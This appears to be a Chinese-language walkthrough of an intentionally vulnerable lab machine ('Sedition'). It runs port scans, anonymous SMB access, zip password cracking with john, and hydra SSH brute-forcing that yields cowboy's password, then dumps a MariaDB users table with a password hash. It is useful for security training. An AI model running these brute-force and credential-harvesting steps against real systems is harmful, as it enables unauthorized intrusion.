[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.100.71:139 Open 192.168.100.71:445 Open 192.168.100.71:65535 [~] Starting Script(s) [~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 15:40 +0800 Initiating ARP Ping Scan at 15:40 Scanning 192.168.100.71 [1 port] Completed ARP Ping Scan at 15:40, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 15:40 Completed Parallel DNS resolution of 1 host. at 15:40, 2.50s elapsed DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0] Initiating SYN Stealth Scan at 15:40 Scanning 192.168.100.71 [3 ports] Discovered open port 65535/tcp on 192.168.100.71 Discovered open port 139/tcp on 192.168.100.71 Discovered open port 445/tcp on 192.168.100.71 Completed SYN Stealth Scan at 15:40, 0.02s elapsed (3 total ports) Nmap scan report for 192.168.100.71 Host is up, received arp-response (0.00067s latency). Scanned at 2026-03-26 15:40:51 CST for 0s
PORT STATE SERVICE REASON 139/tcp open netbios-ssn syn-ack ttl 64 445/tcp open microsoft-ds syn-ack ttl 64 65535/tcp open unknown syn-ack ttl 64 MAC Address: 08:00:27:74:0E:D1 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds Raw packets sent: 4 (160B) | Rcvd: 4 (160B)
枚举 smb 445
1 2 3 4 5 6 7 8 9 10 11 12 13 14
┌──(root㉿LAPTOP-O235O5EH)-[~] └─# smbclient -L 192.168.100.71 Password for [WORKGROUP\root]:
Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers backup Disk IPC$ IPC IPC Service (Samba Server) nobody Disk Home Directories Reconnecting with SMB1 for workgroup listing. smbXcli_negprot_smb1_done: No compatible protocol selected by server. Protocol negotiation to server 192.168.100.71 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE Unable to connect with SMB1 -- no workgroup available
可以看到有个backup,并且可以匿名登录
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root㉿LAPTOP-O235O5EH)-[~] └─# smbclient //192.168.100.71/backup Password for [WORKGROUP\root]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Jul 7 01:02:53 2025 .. D 0 Mon Jul 7 02:15:13 2025 secretito.zip N 216 Mon Jul 7 01:02:31 2025
19480400 blocks of size 1024. 16262084 blocks available smb: \> get secretito.zip getting file \secretito.zip of size 216 as secretito.zip (42.2 KiloBytes/sec) (average 42.2 KiloBytes/sec) smb: \>
┌──(root㉿LAPTOP-O235O5EH)-[~/aaa] └─# john --wordlist=/usr/share/wordlists/rockyou.txt secretito Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 24 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status sebastian (secretito.zip/password) 1g 0:00:00:00 DONE (2026-03-26 15:48) 50.00g/s 2457Kp/s 2457Kc/s 2457KC/s 123456..trudy Use the "--show" option to display all of the cracked passwords reliably Session completed.
[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.100.71:65535 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -sC" on ip 192.168.100.71 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 15:54 +0800 NSE: Loaded 158 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:54 Completed NSE at 15:54, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:54 Completed NSE at 15:54, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:54 Completed NSE at 15:54, 0.00s elapsed Initiating ARP Ping Scan at 15:54 Scanning 192.168.100.71 [1 port] Completed ARP Ping Scan at 15:54, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 15:54 Completed Parallel DNS resolution of 1 host. at 15:54, 2.50s elapsed DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0] Initiating SYN Stealth Scan at 15:54 Scanning 192.168.100.71 [1 port] Discovered open port 65535/tcp on 192.168.100.71 Completed SYN Stealth Scan at 15:54, 0.01s elapsed (1 total ports) Initiating Service scan at 15:54 Scanning 1 service on 192.168.100.71 Completed Service scan at 15:54, 0.02s elapsed (1 service on 1 host) NSE: Script scanning 192.168.100.71. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:54 Completed NSE at 15:54, 0.11s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:54 Completed NSE at 15:54, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:54 Completed NSE at 15:54, 0.00s elapsed Nmap scan report for 192.168.100.71 Host is up, received arp-response (0.00066s latency). Scanned at 2026-03-26 15:54:17 CST for 1s
PORT STATE SERVICE REASON VERSION 65535/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0) | ssh-hostkey: | 256 32:ca:e5:d1:12:c2:1e:11:1e:58:43:32:a0:dc:03:ab (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG/Kzfk09iAKKpRuJrSfx4A4WiSlvP++mk2g5NcP7Bfva4A0l0SZxeDNKXB6iJN1++qyQWE2OUVzLrZ8Gdjkn+M= | 256 79:3a:80:50:61:d9:96:34:e2:db:d6:1e:65:f0:a9:14 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILvZ909p40dk+Vi+xYHAfVXI4wI0XGPS/fgHXpFI2mRP MAC Address: 08:00:27:74:0E:D1 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 15:54 Completed NSE at 15:54, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 15:54 Completed NSE at 15:54, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 15:54 Completed NSE at 15:54, 0.00s elapsed Read data files from: /usr/share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.84 seconds Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
是一个ssh的服务,那么大概率刚刚的密码就是某个用户的密码,现在还缺少用户
hydra爆破
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿LAPTOP-O235O5EH)-[~] └─# hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -p elbunkermolagollon123 -s 65535 ssh://192.168.100.71 Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-26 15:57:17 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task [DATA] attacking ssh://192.168.100.71:65535/ [65535][ssh] host: 192.168.100.71 login: cowboy password: elbunkermolagollon123 [STATUS] 312.00 tries/min, 312 tries in 00:01h, 8295145 to do in 443:08h, 14 active [STATUS] 290.67 tries/min, 872 tries in 00:03h, 8294586 to do in 475:37h, 13 active
cowboy@Sedition:~$ mariadb -u cowboy -pelbunkermolagollon123 Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 31 Server version: 10.11.11-MariaDB-0+deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | bunker | | information_schema | +--------------------+ 2 rows in set (0,002 sec)
MariaDB [(none)]> use bunker; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed MariaDB [bunker]> show tables; +------------------+ | Tables_in_bunker | +------------------+ | users | +------------------+ 1 row in set (0,001 sec)
MariaDB [bunker]> select * from users; +--------+----------------------------------+ | user | password | +--------+----------------------------------+ | debian | 7c6a180b36896a0a8c02787eeafb0e4c | +--------+----------------------------------+ 1 row in set (0,001 sec)
